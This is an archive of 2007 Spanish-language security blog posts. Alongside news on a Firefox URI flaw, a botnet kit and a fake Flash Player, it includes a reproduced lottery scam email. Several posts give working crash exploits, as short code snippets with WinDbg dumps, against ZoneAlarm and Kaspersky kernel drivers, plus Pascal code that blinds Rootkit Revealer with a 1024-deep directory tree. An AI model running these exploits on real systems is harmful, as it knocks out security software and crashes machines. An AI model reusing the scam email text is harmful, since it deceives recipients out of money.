“exploits”

Vulnerabilidad de seguridad Zero-day deja Firefox completamente abierto

Por Mixel Adm el 26 de Julio 2007 7:59 PM

Expertos en seguridad han dejado al descubierto una vulnerabilidad 0-day en la ultima versión de Firefox, la cual provee control total sobre computadoras con el sistema operativo Windows, cuando se visita un sitio "booby-trapped" con el navegador de Mozilla.

La vulnerabilidad consiste en la forma en que Firefox maneja los identificadores uniformes de recursos o URI (uniform resource identifiers) , que es el protocolo que permite al navegador accesar a diferentes programas y otros recursos localizados en la PC. El fallo se produce cuando el navegador es incapaz de procesar correctamente al menos 5 URI diferentes.

durante los últimos meses las URI's han surgido como uno de los eslabones mas débiles en la cadena de seguridad. La semana pasada Mozilla libero un parche critico para Firefox, relacionado con el manejo de URI's. Por otro lado Internet Explorer y Trillian Instant Messenger también fueron victimas de este fallo.

el problema es resultado de la poca documentación que existe de los incontables URI's que son agregados por aplicaciones de terceros al registro de Windows. Los navegadores normalmente no están bien preparados para confrontar de una forma correcta los diferentes exploits de seguridad que surgen de estos URI's, aun y cuando estos son de aplicaciones relacionadas entre si.

Hay que tomar en cuenta que con cada URI que se registra, la posibilidad de que se lleve a cabo un ataque exitoso contra la máquina,esta umenta.

"Esta es una especie de super tormenta en la ue los navegadores no están haciendo correctamente su trabajo, en términos de limpiar las URI's y las aplicaciones que registran esas URI's no son capaces de manejar correctamente los parámetros que están siendo pasados a este por el navegador"

Un vocero de la organización open-source comento que el equipo de seguridad de Mozilla esta es al tanto de este hecho y ya se encuentran generando el parche correspondiente.

Micrsoft esta regalando dinero... ¬¬si como no

Por Mixel Adm el 7 de Julio 2007 12:52 AM

miren nomas lo que le llego a una amiga a su coreo, esto si da risa, pero si es cierto pues minimo que se moche con algo de lana.

Asunto: Congratulations!!! Your Email address is qualified/selected.

MOTTO: FIGHTING POVERTY ROUND THE WORLD

Microsoft Award Team
20 Craven Park, Harlesden London NW10 United Kingdom
Ref: BTD/968/05
Batch: 409978E

CONGRATULATION! CONGRATULATION!! CONGRATULATION!!!

Dear. Sir/ Madam,

The prestigious Microsoft and Aol has set out and successfully organised a Sweepstakes marking the year 2007 anniversary we rolled out over US$ 400,419,864 for our end of year Anniversary Draws. Participants for the draws were randomly selected and drawn from a wide range of web hosts which we enjoy their patronage.

The selection was made through a computer draw system attaching personalised email addresses to ticket numbers. If you ignore this massage, you will Defiantly regret it later. Microsoft and AOL are now the largest Internet companies & in effort to make sure that Internet Explorer remains the most widely used program, Microsoft and AOL are running an e-mail beta test.

Your email address as indicated was drawn and attached to reference and ticket number 008795727498 with serial numbers BTD/9080648302/06 and drew the lucky numbers 14-21-25-39-40-47(20) as one of the 5 jackpot winners in this draw. You have therefore won the entire winning sum of £1,350,000.00 (ONE MILLION THREE HUNDRED AND FIFTY THOUSAND GREAT BRITAIN POUNDS) The draws registered as Draw number one was conducted in Brockley, London United Kingdom on the 13th of January,2007. These Draws are commemorative and as such special.

Please be informed by this winning notification to file your claims immediately.You are also adviced to make contact to your referred agent who shall by duty guide you through the process to facilitate the release of your winning prize. To file for this claims, Please Contact your delivery agency in the contact information below:

DELIVERY AGENCY CONTACT INFORMATION:

NAME OF COURIER FIRM: FRONTIERS DELIVERY SERVICES
OFFICE ADDRESS: 102 Oxford Street London,WC1N 3HR United- Kingdom .
Email:remittunit@hotmail.com ,remittanceagentssa@yahoo.com

Tele:0044-702-403-7964

Contact Person: Mr. James David

We dedicate our special thanks & gratitude to Bill Gates and his associates.We wish you the best of luck as you spend your good fortune in this season.

Note: You have One week from the date of this publication to claim your prize or you may forefeit your winnings. Thank you for being part of our commemorative end of year Anniversary Draws.

DO NOT REPLY TO THIS EMAIL BECAUSE YOU MIGHT NOT BE ATTENDED TO. KINDLY CONTACT YOUR FIDUCIARY AGENT DIRECTLY FOR FURTHER DIRECTIONS

apoco no es de envidiarse su situación yo la neta si quisiera que microsoft me mandara algo así, aunque igual y el que ahora va ha hacer eso es el sr carlos slim, con eso de que ya desbanco a bill gates como el hombre mas rico del mundo.

Este tipo de correos tal vez nos resultan graciosos, pero es algo preocupante la cantidad de spam que circula en estos dias, yo me pregunto que pasaria si se dejaran de enviar tanto correo basura, tal vez y solo talvez subiria la velocidad de toda la internet, pero eso es solo algo que nos gustaria.

Saludos

PandaLabs ha descubierto DreamSystem

Por Mixel Adm el 23 de Junio 2007 4:40 PM

PandaLabs ha descubierto DreamSystem, un sistema para controlar varias variantes de la

familia de bots DreamSocks. la versión 1.3 de esta herramienta es la ultima que se conoce

y esta siendo vendida en varios foros por alrededor de 750 dollares. Por el dinero pagado

se incluyen actualizaciones gratuitas de nuevas versiones.

La herramienta consta de dos partees, La primera permite a los ciber-delincuentes controlar las maquinas comprometidas, convirtiéndolas en servidores, ingresando una URL en los bots,esto es para que se conecten a ella y comiencen a recibir ordenes. La segunda parte es la parte que permite enviar las ordenes a esas maquinas infectadas. Esta ultima ha sido encontrada en muchos foros, lo cual indica que hay varias botnet controladas por esta herramienta.

Los bots controlados mediante DreamSystem permiten que el atacante las convierta en zombies y también las utilice como servidores. Además también permite que el bot descargue y ejecute cualquier tipo de archivos, incluyendo otros códigos maliciosos.

En los foros donde se ha encontrado esta herramienta, esta se esta utilizando para lanzar ataques de Delegación de Servicio Distribuidos(DDoS por sus siglas en ingles) en contra de Servidores web. Esto puede ser en dos protocolos:UDP y TCP.

Los Ciber-delincuentes usan estos ataques para bloquear los servicios proporcionados por compañías que basan sus servicios en internet, -con las perdidas que esto acarrea-, si no pagan una cantidad para detener el ataque.

Las técnicas utilizadas para distribuir estas variantes de los bots van desde la utilización de exploits para infectar la maquina de usuarios, como Mpack o enviando spam con el bot como contenido.

Falso Flash Player es utilizado para distribuir Malware

Por Mixel Adm el 22 de Junio 2007 7:09 PM

Los hackers han desarrollado una nueva forma de engañar alos usuarios y que descarguen malware desde un sitio de descarga apocrifo de Adobe Shockwave Player.

la forma en que operan estos sitios es mostrando iconos especialmente formados, para hacer creer al usuario que su copia de Shockwave (si es que se encuentra instalado) no esta funcionando correctamente.

Todos los links apuntan a otro sitio el cual da un "diagnostico del problema", hay que actualizar el macromedia flash player. El usuario es redirigido a un sitio que se hacer pasar por el Centro de descarga del hockwave Player.

Por supuesto la descarga es un troyano, en vez del popular Flash player. Entre las características del sitio podemos encontrar que deshabilita el botón derecho del mouse.

Con la utilización de ingeniería social, en vez de utilizar permanentemente vulnerabilidades, tales como el iFrame en internet explorer, los hackers extienden los rangos de sus posibles víctimas.

Exploit para Zone Alarm

Por Mixel Adm el 18 de Junio 2007 2:33 PM

El otro dia posteamos un exploit para KAV y ahora le toco el turno a Zone Alarm, un firewall muy usado por su servidor.
El post original esta en ingles aquí

ZoneAlarm Pro version:7.0.337.000
Driver version:7.0.337.000

Actualmente estamos trabajando con varios antivirus / firewalls y estamos probando la estabilidad de algunos de ellos . Lo cual muestra una muy mala situación. ;)

Todos adoran usar ganchos =), desafortunadamete el nivel de conocimiento de sus desarrolladores de drivers para el kernel deja mucho que desear. Simplemente no saben como manejar los ganchos en la SSDT.

Sistema: Windows XP SP2 sin PAE
Exploit: NtCreatePort pobre manejo del gancho, service id 46

NtCreatePort esta ganchada por las fucniones del driver vsdatant.sys.

Prototipo de la Función

NTSYSAPI
NTSTATUS
NTAPI
NtCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);

Aquí estan un pequeño exploit que conduce a un pantallazo azul.
Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.

NtCreatePort(nil, pointer($81234567), 0, 0, 0);

Y aquí esta el analisis de este BSOD

Originally posted by windbg

kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd256, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 4

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd256

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
fc65bd48 804df06b 00000000 81234567 00000000 vsdatant+0x33256
fc65bd64 7c90eb94 badb0d00 0012fe10 00000000 nt+0x806b
fc65bd68 badb0d00 0012fe10 00000000 00000000 0x7c90eb94
fc65bd6c 0012fe10 00000000 00000000 00000000 0xbadb0d00
fc65bd70 00000000 00000000 00000000 00000000 0x12fe10

STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33256

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------

Otro exploit con la misma técnica para el mismo firewall.

Sistema: Windows XP SP2 sin PAE
Exploit: NtCreateWaitablePort, service id 56

NtCreateWaitablePort es otra función ganchada por el driver.

Function prototype

NTSYSAPI
NTSTATUS
NTAPI
NtCreateWaitablePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);

Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.

NtCreateWaitablePort(nil, pointer($81234567), 0, 0, 0);

Esto lleva inmediatamente a un BSOD

analisis en windbg

kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd336, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 5

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd336

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f89ded48 804df06b 00000000 81234567 00000000 vsdatant+0x33336
f89ded64 7c90eb94 badb0d00 0012fe10 f90f5d98 nt+0x806b
f89ded68 badb0d00 0012fe10 f90f5d98 f90f5dcc 0x7c90eb94
f89ded6c 0012fe10 f90f5d98 f90f5dcc 00000000 0xbadb0d00
f89ded70 f90f5d98 f90f5dcc 00000000 00000000 0x12fe10
f89ded74 f90f5dcc 00000000 00000000 00000000 0xf90f5d98
f89ded78 00000000 00000000 00000000 00000000 0xf90f5dcc

STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33336

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------

Estamo seguros que existen otros ganchos codificados de una manera deficiente, mas ya no seguimos probando otros.

Saludos
EP_X0FF/UG North

Vulnerabilidad en Rootkit Revealer

Por Mixel Adm el 11 de Junio 2007 8:44 PM

Hoy les traigo otro exploit el cual tiene que ver con Rootkit Revealer, es una traducción directa del texto publicado por EP_X0FF en los foros de sysinternals aquí
nota:
Solamente usenlo si realmnente saben lo que hacen...

Rootkit Revelaler (RKR) es un detector de Rookits muy conocido el cual es usado para revelar algunos rootkits de modo usuario así como algunas cuantas cosas del modo kernel.

Puede detectar archivos ocultos haciendo lecturas de modo RAW y usando su propio parser para el sistema de archivos. Puede detectar entradas ocultas en el registro volcando directamente desde el disco por medio de un driver y la función ZwSaveKey y utilizando su propio parser para esto.

Existen varias maneras de sobrepasar completamente a RKR, pero el detector mismo puede ayudarte a sobrepasarlo. Esta vulnerabilidad esta presente en todas las versiones de RKR inclusive en las más antiguas versiones de línea de comando.

El objetivo principal del exploit es usar restricciones del sistema de archivos que también están presentes en RKR. El exploit crea un árbol de 1024 directorios es decir cada uno esta dentro del anterior, y después copia calc.exe (la calculadora de windows) en el último directorio creado con el nombre “test.exe”. Después de crear este exploit cualquier escaneada al disco con RKR será completamente inútil, porque cuando RKR pase por el directorio del exploit este comenzara a mostrar todo los directorios y archivos como "Visible in Windows API, MFT, but not in directory index".

Usando este exploit con las viejas versiones de consolas genera un error de violación de acceso.

El codigo del exploit se muestra a continuación…

Advertencia:

Debido a las raices del Sitema de Archivos y a las restricciones de la Ínterfaz Grafica de Windows no es sencillo eliminar el exploit del disco. Así que no lo uses en una maquina real si no sabes como eliminar el archivo.

var

 i: integer;

 buf: array[0..100000] of wchar;

 buf2: LBuf;

begin

 memzero(@buf, sizeof(buf));

 GetWindowsDirectoryW(buf2, MAX_PATH);

 strcpyW(buf, '\\?\C:\adir');

 CreateDirectoryW(buf, nil);

 for i := 0 to 1023 do

 begin

   strcatW(buf, '\adir');

   CreateDirectoryW(buf, nil);

 end;

 strcatW(buf, '\test.exe');

 strcatW(buf2, '\calc.exe');

 CopyFileW(buf2, buf, false);

end;

Este no es un exploit “puro” debido a que no genera escalación de privilegios. Este se puede clasificar como uno del tipo DoS (Denegación del Servicio).

Para corregir esta vulnerabilidad es necesario modificar RKR para soportar rutas UNC.

Klif.sys calling NtOpenProcess vulnerability

Por Mixel Adm el 9 de Junio 2007 2:34 PM

Después de que ayer se publicara acerca de la Vulnerabilidad de KAS 7.0 Kaspersky Lab reacciono diciendo que no fueron notificados a tiempo con todo y que la vulnerabilidad tenia un año o mas he aquí lo que Kaspersky respondió hoy

El enlace original en ingles

Un consultor (EP_X0FF), recientemente ha publicado en rootkit.com acerca de una vulnerabilidad en KAV 7.0. Desafortunadamente el autor de este material no se ha apegado a la practica estándar de la industria, de contactar a la empresa desarrolladora antes de divulgar los detalles de la vulnerabilidad. Aunque el autor afirma que todos los intentos de informar a Kaspersky Lab acerca de esta vulnerabilidad, fueron ignorados, este no ha sido el caso: Si hubiéramos sido informados, este hecho hubiera sido resuelto desde mucho tiempo atrás.

Los siguientes productos son vulnerables:

Kaspersky Internet Security 6.0/7.0
Kaspersky Anti-Virus 6.0/7.0
Kaspersky Anti-Virus for Windows Workstations 6.0
Kaspersky Anti-Virus 6.0 for Windows Servers

Estos productos son vulnerables solo cuando se ejecutan en los siguientes SOs:

Windows NT
Windows 2000
Windows 2003 x86
Windows XP x86
Productos corriendo en otros SO de Microsoft no son afectados por este percance.

Esta vulnerabilidad esta clasificada como de bajo riesgo debido a la naturaleza de la misma: El usuario tiene que lanzar el exploit manualmente en su computadora. El resultado de explotar esta vulnerabilidad es un error critico del sistema (BSOD) pero no hay una escalación de privilegios o provee algún control de el equipo en forma remota.

Un parche para esta vulnerabilidad sera lanzado en estos días. El parche se instalara estomáticamente. Daremos mas información cuando se lance el parche.

Seguramente que a los señores de KAV esta información no les cayo muy en gracia pero en fin alguine la tenia que publicar...

Saludos

BUGS en la (Proactive Defense) de Kaspersky Antivirus

Por Mixel Adm el 8 de Junio 2007 2:32 PM

Esta es una traducción de una entrada que hizo el buen EP_X0FF en los foros de sysinternals
y que pueden leer en ingles aquí

El bien conocido antivirus Kaspersky, desde hace un buen tiempo sufre de un bug muy peligroso, el cual permite tronar el sistema protegido por este antivirus, aun desde la cuenta de invitado.

Todos los intentos de avisar a Kaspersky Lab sobre esta vulnerabilidad han sido ignorados. Este material fue mostrado varios años atras, y en el ultimo verano publicamos un nuevo exploit para Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem. Y despues de este tiempo nada ha cambiado. Aun ahora con la nueva version Kaspersky AV 7.0 este exploit sigue funcionando muy bien.
El objetivo principal de este exploit es hacer una llamda a NtOpenProcess con parametros invalidios. Esta funcion esta intervenida (hooked) por el diver de Kaspersky llamdo klif.sys y la reazon para este intercepción es obia - Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso, esto es muy usado por el malware.

Aqui el prototipo de esta función


NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT  PHANDLE ProcessHandle,
              IN ACCESS_MASK  DesiredAccess,
              IN POBJECT_ATTRIBUTES  ObjectAttributes,
              IN PCLIENT_ID ClientId OPTIONAL  );

Aquí un pequeño exploit codificado en pascal(funciona para el klif.sys vesion 6.12.10.280 y versiones previas)


var
 ob1: OBJECT_ATTRIBUTES;
 p1:  DWORD;
begin
 ob1.Length := sizeof(ob1);
 NtOpenProcess(@p1,  PROCESS_QUERY_INFORMATION, @ob1,  pointer($82000000));
end;

Como podran ver el ultimo parametro es la dirección de la estructura CLIENT_ID, la cual apunta hacia una región aleatoria dentro de la memoria del kernel.
al probar el xploit en una instalación limpia de windows XP , sin KAV -no hay BSOD(Blue Screen Of Death o Pantallazo azul).

Al ejecutarlo en un Windows XP protegido por KAV 7.0 -inmediatamente tenemos un BSOD - PAGE_FAULT_IN_NONPAGED_AREA.

Pero ¿Porque pasa esto? la respuesta es muy sencilla. Supongo que el codigo fuente de el hook en NtOpenProcess es algo como esto:


NTSTATUS NewNtOpenProcess (
   OUT PHANDLE  ProcessHandle,
   IN ACCESS_MASK DesiredAccess,
   IN POBJECT_ATTRIBUTES  ObjectAttributes,
   IN PCLIENT_ID ClientId  OPTIONAL)
{
   __try
  {

    if (ClientId->UniqueProcess  == KasperskyProcesss) return STATUS_ACCESS_DENIED;

   else return  RealNtOpenProcess(ProcessHandle, DesiredAccess,
                                 ObjectAttributes,  ClientId);
  __except (EXCEPTION_EXECUTE_HANDLER)
  {
     ... stuff  here ...
  }
}

El gran problema aquí es ClientId->UniqueProcess, ya que ClientId es un PUNTERO a una estructura. El hecho de accesar a una región invalida de memoria produce inmediatamente un PAGE_FAULT_IN_NONPAGED_AREA.

el exploit original fue creado por Ms-Rem y luce así


NtOpenProcess(NULL, (HANDLE)0, NULL,  NULL);

Comopodras observar los desarrolladores de KAV han usado un bloque try/except, y parece ser que no saben usar otro tipo de funciones manejadoras de erores.

Esperemos que los desarrolladores de Kaspersky Antivirus descubran el fabuloso programa llamado NtCall y corrigan su bug.


*******************************************************************************
*                                                                             *
*                        Bugcheck  Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA  (50)
Invalid system memory was referenced.  This cannot be protected by  try-except,
it must be protected by a Probe.  Typically the address is just  plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000,  memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write  operation.
Arg3: f941840c, If non-zero, the instruction address which  referenced the bad memory
   address.
Arg4: 00000000,  (reserved)

Debugging Details:
------------------

ANALYSIS:  Kernel with unknown size. Will force reload symbols with known  size.
ANALYSIS: Force reload command: .reload /f  ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG.  Please fix symbols to do analysis.

***** Kernel symbols are WRONG. Please  fix symbols to do analysis.


MODULE_NAME: klif

FAULTING_MODULE:  804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP:  46260f1c

READ_ADDRESS:  unable to get nt!MmSpecialPoolStart
unable to get  nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get  nt!MmPoolCodeEnd
83000000

FAULTING_IP:
klif+1940c
f941840c  0fbe08          movsx   ecx,byte ptr  [eax]

MM_INTERNAL_CODE:  0

CUSTOMER_CRASH_COUNT:  1

DEFAULT_BUCKET_ID:  WRONG_SYMBOLS

BUGCHECK_STR:  0x50

LAST_CONTROL_TRANSFER:  from  f941b39a to f941840c

STACK_TEXT:
WARNING: Stack unwind information  not available. Following frames may be wrong.
f64c8d24 f941b39a 83000000  00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000  klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000  0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000  0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000  0x12f3e4


STACK_COMMAND:  kb

FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08          movsx   ecx,byte ptr  [eax]

SYMBOL_STACK_INDEX:  0

FOLLOWUP_NAME:  MachineOwner

IMAGE_NAME:  klif.sys

SYMBOL_NAME:  klif+1940c

BUCKET_ID:  WRONG_SYMBOLS

Followup:  MachineOwner

Algunos descubrimientos hechos por UG North muestran que hay otras funciones que tambien estan intervenidas por klif.sis las cuales pueden ser explotadas con ataques similares.

Lista de entradas en la SSDT explotables (Windows XP / KAV 7.0.0.55)

==================================
|[Idx] [nombre de la función] |
==================================
|[41 ] NtCreateKey
|[47 ] NtCreateProcess
|[48 ] NtCreateProcessEx
|[50 ] NtCreateSection
|[52 ] NtCreateSymbolicLinkObject
|[53 ] NtCreateThread
|[65 ] NtDeleteValueKey
|[99 ] NtLoadKey2
|[119] NtOpenKey
|[122] NtOpenProcess
|[125] NtOpenSection
|[177] NtQueryValueKey
==================================
Cualquier llamada a esas funciones con parametros invalidos, llevara a un BSOD.

Este tipo de exploit fue descubierto por Ms-Rem en el 2005 y funciona para KAV 5.0

Como se mostro este exploit funciona para todas la versiones de Kaspersky Antivirus incluyendo la nueva versión 7.0.

¿Realmente aun crees quie estas portegido?